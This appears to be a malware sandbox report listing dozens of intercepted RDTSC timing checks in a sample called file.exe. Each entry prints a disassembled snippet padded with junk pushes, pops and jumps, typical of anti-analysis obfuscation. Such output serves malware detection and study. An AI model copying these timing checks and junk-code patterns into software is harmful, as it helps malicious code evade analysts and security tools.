                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102817B second address: 10281AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F4FE915D6A8h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jmp 00007F4FE915D6B5h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10285D2 second address: 10285D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10285D8 second address: 10285DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028757 second address: 1028762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028762 second address: 1028782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F4FE915D6A6h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102A981 second address: 102A99D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C68h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CF81 second address: F4CF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CF89 second address: F4CF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CF8D second address: F4CF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CF95 second address: F4CFAD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FE9502C5Eh 0x00000008 jl 00007F4FE9502C62h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F2D3 second address: 102F2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10390AB second address: 10390DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jp 00007F4FE9502C56h 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 jnl 00007F4FE9502C5Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4FE9502C60h 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10390DE second address: 10390EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F4FE915D6A6h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F463CD second address: F463D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C82E second address: 103C857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6AEh 0x00000009 jmp 00007F4FE915D6B7h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C857 second address: 103C87E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C66h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jno 00007F4FE9502C60h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050714 second address: 105071C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105071C second address: 1050720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050720 second address: 105072A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4FE915D6A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10524D7 second address: 1052513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F4FE9502C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4FE9502C64h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F4FE9502C56h 0x00000019 jmp 00007F4FE9502C64h 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A9DD second address: 106A9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ACDF second address: 106AD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4FE9502C67h 0x0000000b jmp 00007F4FE9502C64h 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AD11 second address: 106AD1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4FE915D6A6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AD1B second address: 106AD1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B28E second address: 106B295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B40E second address: 106B440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE9502C62h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c jnl 00007F4FE9502C56h 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jne 00007F4FE9502C70h 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007F4FE9502C56h 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B583 second address: 106B58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E4CA second address: 106E4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FE9502C56h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8C8 second address: 106E8DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F4FE915D6A8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FDA5 second address: 106FDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4FE9502C67h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FDC8 second address: 106FDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6ABh 0x00000009 popad 0x0000000a pushad 0x0000000b ja 00007F4FE915D6A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FDE1 second address: 106FDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071422 second address: 1071428 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071428 second address: 1071434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071434 second address: 1071438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10731D0 second address: 10731F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FE9502C67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10731F2 second address: 10731FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4FE915D6A6h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10731FD second address: 1073205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0EB3 second address: 50F0EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0EB7 second address: 50F0EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0EBD second address: 50F0EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0EC3 second address: 50F0EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0EC7 second address: 50F0EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4FE915D6AEh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0EE2 second address: 50F0EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0EE8 second address: 50F0EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6ADh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0C96 second address: 50E0C9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0C9C second address: 50E0CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE915D6B7h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0CC8 second address: 50E0CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE9502C5Ch 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0CF4 second address: 50E0CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0CFA second address: 50E0CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0CFE second address: 50E0D65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movsx edx, si 0x0000000d mov ch, E8h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007F4FE915D6B3h 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F4FE915D6ABh 0x00000021 adc ecx, 0C7F704Eh 0x00000027 jmp 00007F4FE915D6B9h 0x0000002c popfd 0x0000002d call 00007F4FE915D6B0h 0x00000032 pop eax 0x00000033 popad 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0D65 second address: 50E0D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120880 second address: 512089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B8h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512089C second address: 51208E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F4FE9502C5Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov bl, cl 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop edi 0x00000017 pop eax 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4FE9502C5Ah 0x00000024 add ecx, 3559AF58h 0x0000002a jmp 00007F4FE9502C5Bh 0x0000002f popfd 0x00000030 movzx eax, di 0x00000033 popad 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51208E2 second address: 5120922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FE915D6B0h 0x00000009 add si, B9B8h 0x0000000e jmp 00007F4FE915D6ABh 0x00000013 popfd 0x00000014 mov cx, 6DEFh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4FE915D6B1h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120922 second address: 5120928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120928 second address: 512092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C015F second address: 50C01B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 2Ch 0x00000005 pushfd 0x00000006 jmp 00007F4FE9502C65h 0x0000000b sbb esi, 1881EB96h 0x00000011 jmp 00007F4FE9502C61h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4FE9502C68h 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01B4 second address: 50C01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01BA second address: 50C01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov ch, E2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, 54480173h 0x00000014 mov si, 41CFh 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01D3 second address: 50C01D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01D9 second address: 50C022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e jmp 00007F4FE9502C66h 0x00000013 push dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4FE9502C67h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C022B second address: 50C0243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0243 second address: 50C025D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C025D second address: 50C0263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0263 second address: 50C0280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C69h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02DB second address: 50C0340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE915D6AFh 0x00000008 pushfd 0x00000009 jmp 00007F4FE915D6B8h 0x0000000e add ax, D048h 0x00000013 jmp 00007F4FE915D6ABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F4FE915D6B2h 0x00000026 sbb cl, FFFFFFA8h 0x00000029 jmp 00007F4FE915D6ABh 0x0000002e popfd 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0982 second address: 50E09AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE9502C67h 0x00000008 mov edx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, 0CBDh 0x00000015 mov ch, B7h 0x00000017 popad 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E09AC second address: 50E09B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E09B2 second address: 50E09E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx ebx, cx 0x0000000f pushfd 0x00000010 jmp 00007F4FE9502C60h 0x00000015 add ax, 9EF8h 0x0000001a jmp 00007F4FE9502C5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E09E4 second address: 50E09EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E09EA second address: 50E09EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E09EE second address: 50E09F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E09F2 second address: 50E0A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0A02 second address: 50E0A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0A06 second address: 50E0A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0157 second address: 50F015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F015B second address: 50F015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F015F second address: 50F0165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0165 second address: 50F018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F4FE9502C5Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F018F second address: 50F0194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0194 second address: 50F01CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FE9502C68h 0x00000009 sub si, 6698h 0x0000000e jmp 00007F4FE9502C5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F01CB second address: 50F01CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F01CF second address: 50F01D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F01D3 second address: 50F01D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F01D9 second address: 50F01DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120776 second address: 512077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512077A second address: 512077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512077E second address: 5120784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120784 second address: 51207A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov edi, 79439FD4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4FE9502C62h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51207A8 second address: 51207AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
